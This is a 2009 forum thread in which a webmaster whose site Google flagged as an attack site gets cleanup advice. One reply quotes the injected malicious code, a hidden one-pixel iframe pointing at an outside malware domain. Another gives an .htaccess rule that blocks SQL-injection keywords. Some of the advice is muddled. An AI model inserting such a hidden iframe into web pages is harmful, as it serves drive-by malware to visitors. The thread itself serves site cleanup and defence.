1. Advertising
    y u no do it?

    Advertising (learn more)

    Advertise virtually anything here, with CPM banner ads, CPM email ads and CPC contextual links. You can target relevant areas of the site and show ads based on geographical location of the user if you wish.

    Starts at just $1 per CPM or $0.10 per CPC.

My website has been reported by google as an "Attack Site" ! Help Please !

Discussion in 'Security' started by maineexista, Oct 24, 2009.

  1. #1
    Just notice this morning (Romania hour +2h GMT) a message in my google webmaster's account telling me that my site had just been reported as an "Attack site", i know nothing about it.
    What should i do ?
    Where and what should I look for ?

    :confused:

    Any help is appreciated.:(
    Have a good day,
     
    maineexista, Oct 24, 2009 IP
  2. sikhrule

    sikhrule Peon

    Messages:
    900
    Likes Received:
    13
    Best Answers:
    0
    Trophy Points:
    0
    #2
    chech backend......and see whats wrong........then submit to google for review.....happened to me couple times.......dont worry everyday u learn something new............once u fix backend....or update ur website ...then submit to google from webmaster account........it will take about a week the max from the day u submit for google to list ur site safe

    dont stress too much........fix it..........
     
    sikhrule, Oct 24, 2009 IP
  3. theo-zzzz

    theo-zzzz Notable Member

    Messages:
    578
    Likes Received:
    16
    Best Answers:
    0
    Trophy Points:
    205
    #3
    I ignored the warning and visited your website.
    McAfee antivirus gave this warning

     
    theo-zzzz, Oct 25, 2009 IP
  4. techbabu

    techbabu Peon

    Messages:
    20
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #4
    Check your webserver's apache and system security logs, also check rootkit.

    Then you can easily examine your problem.

    ----------------
    Techbabu
    Don't just make a website: Make an impact
     
    techbabu, Oct 26, 2009 IP
  5. SecureCP

    SecureCP Guest

    Messages:
    226
    Likes Received:
    2
    Best Answers:
    0
    Trophy Points:
    0
    #5
    Strip the codes from your files. Once complete, scan your computer for trojans/malware, finally change your ftp passwords and upload your clean files.
     
    SecureCP, Oct 26, 2009 IP
  6. mike_sun

    mike_sun Well-Known Member

    Messages:
    859
    Likes Received:
    45
    Best Answers:
    0
    Trophy Points:
    140
    #6
    Hi,
    maineexista,
    I've suffered the same couple of weeks ago with the same problem. and now my all sites are doing well and Google remove it from his DB to explain my visitors that it's an attack site. i keep changing the code for many times but nothing work out.
    reasons; your PC contained some virus that is attacking to your website only when you run your ftp.
    See, how i accomplished this job in steps.
    1. remove the active antivirus from you PC and restart it.
    2. download another antivirus from this link...http://download.cnet.com/Avast-Professional-Edition/3000-2239_4-10181058.html?tag=mncol
    3. install and scan all drive, don't miss out any single drive.
    4. add this java enabled injection so no further attack may proceed.
    RewriteCond %{QUERY_STRING} ^.*(;|<|>|'|"|\)|%0A|%0D|%22|%27|%3C|%3E|%00).*(/\*|union|select|insert|cast|set|declare|drop|update|md5|benchmark).* [NC]
    RewriteRule .* - [F]
    5.check with CONTROL+F to locate the iframe and remove it from the script.
    6. use the google webmaster tool to inform the google for reconsideration of your site.
    7. here you are done.
    thanks.
     
    Last edited: Nov 1, 2009
    mike_sun, Nov 1, 2009 IP
    maineexista likes this.
  7. nikb

    nikb Peon

    Messages:
    93
    Likes Received:
    1
    Best Answers:
    0
    Trophy Points:
    0
    #7
    <iframe src="http://dakilfu.net/?click=C03E7A" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
    HTML:
    This is your iframe.
    Little bit more info: http://google.com/safebrowsing/diagnostic?site=dakilfu.net/&hl=ru-ru
    http://www.virustotal.com/analisis/...804e6369348834f03cec666b9944a40bfa-1257189288
    Because of this code inserted after tags </body></html> you must check your index.php file and also all included files (look for functions like require, include), also check these files for something with base64 inside and post code here.

    Check which version of PHP Link Directory you are using and which version is current. Update it if needed.

    Change your admin password. Use minimum 9 characters. Make something like asRT@76kf or, if you can not remember passwords, make it something like "5 Red @ppels". Do not use same passwords for cp, ftp, admin etc.

    If you have removed iframe or uploaded new site change file permissions with your ftp client or cpanel. Permissions must be 644 or -rw-r--r--
     
    nikb, Nov 2, 2009 IP
    maineexista likes this.
  8. AKSIN

    AKSIN Peon

    Messages:
    159
    Likes Received:
    1
    Best Answers:
    0
    Trophy Points:
    0
    #8
    1.Go to the source code of your site. Pay attention to your before or after <body> or </body>, you may find iframe link - remove it and upload.
    2.Go to webmaster tool and tell google to reconsider your site
    3.Install antivirus software, enable daily and online scaning
    4.Enjoy!
     
    AKSIN, Nov 3, 2009 IP
  9. maineexista

    maineexista Peon

    Messages:
    317
    Likes Received:
    2
    Best Answers:
    0
    Trophy Points:
    0
    #9
    thanks everyone for beeing so nice and offers so many infos on that issue.

    i did checked a few things of what you guys said and it isn't ready yet but i will do it as soon as i will have some spare time.

    Thanks again, for all these precios informations on this topic ;)

    I will post the entire working solution here when it's done;)
     
    maineexista, Nov 6, 2009 IP
  10. maineexista

    maineexista Peon

    Messages:
    317
    Likes Received:
    2
    Best Answers:
    0
    Trophy Points:
    0
    #10
    this morning i've observed that google removed my site from their blacklist and i am pretty surprised to see i have over +3000,00% visitors / day
    i hope it will grow even more.r help.

    Thanks again for you,

    Have a great day ;)
     
    maineexista, Nov 12, 2009 IP